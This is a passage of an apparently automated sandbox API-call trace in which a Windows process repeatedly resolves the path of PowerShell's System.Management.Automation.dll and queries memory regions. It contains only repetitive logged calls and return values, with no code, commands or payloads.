lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.627] GetLastError () returned 0x0 [0076.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.627] GetLastError () returned 0x0 [0076.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad958, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.628] GetLastError () returned 0x0 [0076.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.628] GetLastError () returned 0x0 [0076.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.628] GetLastError () returned 0x0 [0076.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.628] GetLastError () returned 0x0 [0076.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.628] GetLastError () returned 0x0 [0076.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.628] GetLastError () returned 0x0 [0076.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.628] GetLastError () returned 0x0 [0076.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.628] GetLastError () returned 0x0 [0076.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.629] GetLastError () returned 0x0 [0076.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.629] GetLastError () returned 0x0 [0076.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.629] GetLastError () returned 0x0 [0076.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.629] GetLastError () returned 0x0 [0076.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.629] GetLastError () returned 0x0 [0076.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.629] GetLastError () returned 0x0 [0076.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.629] GetLastError () returned 0x0 [0076.631] VirtualQuery (in: lpAddress=0xacb94, lpBuffer=0xadb94, dwLength=0x1c | out: lpBuffer=0xadb94*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.633] VirtualQuery (in: lpAddress=0xacbd0, lpBuffer=0xadbd0, dwLength=0x1c | out: lpBuffer=0xadbd0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.633] GetLastError () returned 0x0 [0076.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.633] GetLastError () returned 0x0 [0076.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.633] GetLastError () returned 0x0 [0076.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.633] GetLastError () returned 0x0 [0076.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.633] GetLastError () returned 0x0 [0076.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.634] GetLastError () returned 0x0 [0076.634] VirtualQuery (in: lpAddress=0xacf00, lpBuffer=0xadf00, dwLength=0x1c | out: lpBuffer=0xadf00*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.634] GetLastError () returned 0x0 [0076.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.634] GetLastError () returned 0x0 [0076.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.634] GetLastError () returned 0x0 [0076.634] VirtualQuery (in: lpAddress=0xacf00, lpBuffer=0xadf00, dwLength=0x1c | out: lpBuffer=0xadf00*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.635] GetLastError () returned 0x0 [0076.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.635] GetLastError () returned 0x0 [0076.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.635] GetLastError () returned 0x0 [0076.635] VirtualQuery (in: lpAddress=0xacf00, lpBuffer=0xadf00, dwLength=0x1c | out: lpBuffer=0xadf00*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.635] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.636] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.637] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.637] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.637] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.638] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.638] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.638] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.638] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.639] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.640] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.640] VirtualQuery (in: lpAddress=0xacd3c, lpBuffer=0xadd3c, dwLength=0x1c | out: lpBuffer=0xadd3c*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.640] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.641] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.642] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.642] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.642] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x20bed752, Data2=0x8f15, Data3=0x4f1e, Data4=([0]=0x9c, [1]=0x9c, [2]=0x9d, [3]=0x76, [4]=0xf3, [5]=0xbf, [6]=0x16, [7]=0x3f))) returned 0x0 [0076.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad958, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.642] GetLastError () returned 0x0 [0076.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.642] GetLastError () returned 0x0 [0076.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.642] GetLastError () returned 0x0 [0076.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad958, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.642] GetLastError () returned 0x0 [0076.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.643] GetLastError () returned 0x0 [0076.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.643] GetLastError () returned 0x0 [0076.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.643] GetLastError () returned 0x0 [0076.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.643] GetLastError () returned 0x0 [0076.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.643] GetLastError () returned 0x0 [0076.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.643] GetLastError () returned 0x0 [0076.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.643] GetLastError () returned 0x0 [0076.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.643] GetLastError () returned 0x0 [0076.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.643] GetLastError () returned 0x0 [0076.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.644] GetLastError () returned 0x0 [0076.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.644] GetLastError () returned 0x0 [0076.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.644] GetLastError () returned 0x0 [0076.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.644] GetLastError () returned 0x0 [0076.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.644] GetLastError () returned 0x0 [0076.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.644] GetLastError () returned 0x0 [0076.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.644] GetLastError () returned 0x0 [0076.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: 